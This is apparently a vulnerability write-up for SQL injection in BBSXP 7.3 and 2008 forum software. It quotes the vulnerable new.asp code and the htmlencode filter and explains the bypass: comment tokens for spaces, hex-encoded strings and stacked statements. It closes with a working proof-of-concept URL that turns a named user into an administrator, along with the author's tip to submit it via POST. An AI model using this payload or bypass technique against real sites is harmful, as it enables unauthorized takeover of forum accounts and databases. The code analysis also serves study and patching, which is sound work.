Affected systems:
bbsxp7.3
bbsxp2008
Vulnerable file:
new.asp
Code analysis:
sort=htmlencode(request("sort")) ' line 24: the only filtering applied to the sort parameter
if sort = empty then
    sqlsort="threadid"
else
    sqlsort=sort
end if
......
sql="select top "&sqltopiccount&" * from ["&tableprefix&"threads] where visible=1 "&sqlforumid&" "&sqltimelimit&" order by "&sqlsort&" desc" ' line 66: sqlsort is concatenated straight into ORDER BY
The filter function htmlencode, in the file bbsxp_class.asp (the replacement strings were decoded to bare characters by page extraction and are restored here to the HTML entities the function emits):
function htmlencode(fstring)
fstring=replace(fstring,chr(9),"")
fstring=replace(fstring,chr(13),"")
fstring=replace(fstring,chr(22),"")
fstring=replace(fstring,chr(38),"&amp;") '“&”
fstring=replace(fstring,chr(32),"&nbsp;") '“ ”
fstring=replace(fstring,chr(34),"&quot;") '“"”
fstring=replace(fstring,chr(39),"&#39;") '“'”
fstring=replace(fstring,chr(42)&chr(42),"&#42;&#42;") '“**”/**/
fstring=replace(fstring,chr(44),"&#44;") '“,”
fstring=replace(fstring,chr(45)&chr(45),"&#45;&#45;") '“--”
fstring=replace(fstring,chr(60),"&lt;") '“<”
fstring=replace(fstring,chr(62),"&gt;") '“>”
fstring=replace(fstring,chr(92),"&#92;") '“\”
fstring=replace(fstring,chr(59),"&#59;") '“;”
fstring=replace(fstring,chr(10),"<br>")
fstring=replacetext(fstring,"([&#])([a-z0-9]*);","$1$2;")
if siteconfig("bannedtext")<>"" then fstring=replacetext(fstring,"("&siteconfig("bannedtext")&")",string(len("&$1&"),"*"))
if issqldatabase=0 then ' filter katakana (Japanese characters) [\u30a0-\u30ff] by yuzi
fstring=escape(fstring)
fstring=replacetext(fstring,"%u30([a-f][0-f])","0$1;")
fstring=unescape(fstring)
end if
htmlencode=fstring
end function
htmlencode strips tabs and encodes spaces, quotes, commas, semicolons, "--" and "**", but it leaves a single "*", "/", "=", letters and digits untouched. It is an HTML output encoder, not a SQL validator, and new.asp concatenates the result directly into ORDER BY without checking it against the list of sortable columns.
Insufficient filtering of the variable sqlsort therefore produces a SQL injection vulnerability: inline comments of the form /*o*/ replace whitespace and hex literals replace quoted strings, so a complete statement passes through htmlencode unchanged.
Vulnerability test:
http://localhost/bbsxp/new.asp?sort=threadid/*o*/update/*o*/bbsxp_users/*o*/set/*o*/userroleid=1/*o*/where/*o*/username=0x6c006f00760065006d006d006d00/*o*/select/*o*/*/*o*/from/*o*/bbsxp_users/*o*/order/*o*/by/*o*/userid
In this PoC, /*o*/ stands in for every space (chr(32) is encoded but a lone "*" is not), 0x6c006f00760065006d006d006d00 is the UTF-16LE encoding of lovemmm used in place of a quoted string (chr(39) is encoded), no ";" is needed because SQL Server executes stacked statements without a separator, and the trailing select ... order by userid absorbs the " desc" that line 66 appends, so the whole batch stays syntactically valid.
Successfully changed the user lovemmm into an administrator. (Best to submit it via POST, heh.)